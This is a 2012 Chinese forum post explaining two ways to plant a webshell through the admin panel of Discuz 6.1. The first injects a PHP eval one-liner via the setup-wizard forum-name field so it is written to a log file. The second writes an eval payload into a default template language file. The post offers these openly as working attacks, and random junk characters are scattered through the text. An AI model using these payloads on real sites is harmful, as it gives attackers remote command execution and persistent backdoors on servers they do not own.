discuz6.1两种方法后台拿shell
) y! ?. H* U8 F0 [& A5 d. i好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下& U: g4 @* @! B* i
1:' t$ p( x/ @8 |+ c* R& Z* c
http://127.0.0.1/discuz/admincp. ... zard&frames=yes' A- d* K3 z/ [8 p# a
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell0 g2 J' x% ^4 f$ M+ {+ k) {
<?php eval($_POST[cmd]);?>6 O( ^9 U* ], D, c
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
+ p; I1 y" D8 g, N' ?
# E7 P2 {( N7 w# U6 ?' j# H( B
* T, }: V! R! X1 z1 j S r6 Z2 W2:后台模板管理--默认模板套系--详情
4 Y u" H h1 utemplates/default/actions.lang.php0 v: t0 P6 d) \% S5 U
jhackj\\');eval($_POST[cmd])?>;//. |7 i X$ m+ t, V+ C5 j
" o/ J ?! \; r; [" g0 I利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对